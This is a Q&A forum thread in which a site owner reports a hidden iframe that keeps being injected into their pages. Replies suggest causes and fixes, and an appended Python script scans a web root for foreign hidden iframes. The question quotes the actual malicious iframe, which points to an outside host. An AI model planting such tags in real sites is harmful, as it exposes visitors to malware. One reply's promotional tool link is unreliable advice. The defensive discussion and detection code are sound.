views: 821

answers: 7

I faced a website attack in which some malicious JavaScript code was added to all pages of my website.

Recently I faced another problem: my website was attacked with the following "iframe" tag.

iframe src="http://shopmovielife.cn:8080/index.php" width=127 height=167 style="visibility: hidden"

Even if I remove this tag, the index file of the website is updated on a daily basis. What would be the reason for this behaviour?

Please give me a solution to solve this.

A: 

It may be that one of the scripts used in your website was compromised. Try updating.

Alan Haggai Alavi
A: 

You don't really provide enough information to solve your problem.

But I guess your account credentials (e.g. FTP password) have been compromised. Or you have some, say for example, vulnerable PHP script which allows the attacker to modify your files.

And you should make sure your PC isn't infected with some kind of malware, trojan or virus which possibly stole your account information in the first place.

jitter
A: 

You do not really give enough information so I am kind of guessing but the problem "some malicious javascript code added to all pages in my website" I believe is a SQL Injection attack. Probably it is this one: ASCII-Encoded-Binary-String-Automated-SQL-Injection.

So my guess is that your site is still vulnerable to SQL Injection attacks and that is how the iframe code is getting put into your pages. Check your web logs to see if you notice suspicious requests. And then review all of your code (I know that is not a simple thing) to see if you are dynamically building SQL statements.

Another place to mitigate this type of attack is through security... possibly you can use a different SQL account that only has read only permissions on your database.

This all assumes you are dealing with a SQL injection attack, but from the details you provided it is not 100% clear what is going on.

-Jeff

Jeff Widmer
A: 

The reason is a poor choice in platform and/or code. The solution depends on your code and you have not provided enough details for an answer. Short answer: tighten your security, upgrade your software, reset your passwords and do not use form variables to build strings you pass to external applications, SQL or eval() type functions.

SpliFF
+1  A: 

So how do you update your site? ftp, sharepoint, etc? The daily reinfection may be from the following scenario.

I've seen where a rootkit on a dev box has harvested your credentials for updating the site. So malware would be active on your dev box and it gets your ftp or sharepoint password from your box when you update your site.

So, you go put a clean page up, then the malware network logs into your site at some later date and adds the iframe code back in without you ever knowing.

In case that might be the situation, you should scan the heck out of your dev box with Malwarebytes, SuperAntiSpyware Free, or whatever legit tools you can get. The more the better since some miss what others catch.

So AFTER you are pretty confident your own dev box is clean, then change your password on your FTP, frontpage, sharepoint, whatever. Once you have changed your credentials to your site update mechanism, THEN go upload a clean version of your pages, and wait and see what happens the next day. If the malware network tries to get to your site ftp with your old password, it won't be able to authenticate.

Neil
A: 

If that happens often, I advise you to watch your server with the Iframe.attack software; the software looks for all the iframes on your server and can delete them easily. That works well for me. At the same time I try to keep my computer clean with an antivirus scan every day, and I also stopped using FileZilla (just in case); I use an alternative homemade FTP client. Good luck with this. (Sorry for my English...)

A: 

The link to the iframe.attack software: http://kawablog.com/scarabox/product.php?id_produit=1&lng=en works for me

gs
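
The kind of server-side iframe check the answers describe, as an added example (not code from any poster and not the Iframe.attack tool): it walks a web root and reports every iframe that loads from a host you do not own, with the file's modification time so the change can be matched against FTP and web logs. The host names, file names and the `SCAN_EXT` list are constructed assumptions.

```python
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

SCAN_EXT = (".html", ".htm", ".php")  # assumption: page types the site serves

class IframeFinder(HTMLParser):
    """Collects iframes whose src points at a host the site does not own."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts, self.hits = own_hosts, []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = urlparse(a.get("src", "")).hostname
        if not host or host in self.own_hosts:
            return  # relative or same-site frame: not reported
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        self.hits.append((self.getpos()[0], host, hidden))

def scan_tree(root, own_hosts):
    """Return (path, line, host, hidden, mtime) for every foreign iframe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                finder = IframeFinder(own_hosts)
                finder.feed(fh.read())
            mtime = os.path.getmtime(path)  # compare with FTP/web log times
            findings += [(path, ln, h, hid, mtime) for ln, h, hid in finder.hits]
    return findings

def demo():
    """Build a constructed two-file web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "about.html"), "w") as fh:
            fh.write('<p>ok</p>\n<iframe src="/map.html"></iframe>\n')
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write('<html><body>hi</body></html>\n'
                     '<iframe src="http://injected.example:8080/index.php" '
                     'width=127 height=167 style="visibility: hidden"></iframe>\n')
        return [(os.path.basename(p), ln, h, hid)
                for p, ln, h, hid, _m in scan_tree(root, {"www.mysite.example"})]
```

Run `scan_tree` on a schedule against the real document root; a finding that reappears after cleanup, with a fresh modification time, tells you when to look in the FTP and web server logs.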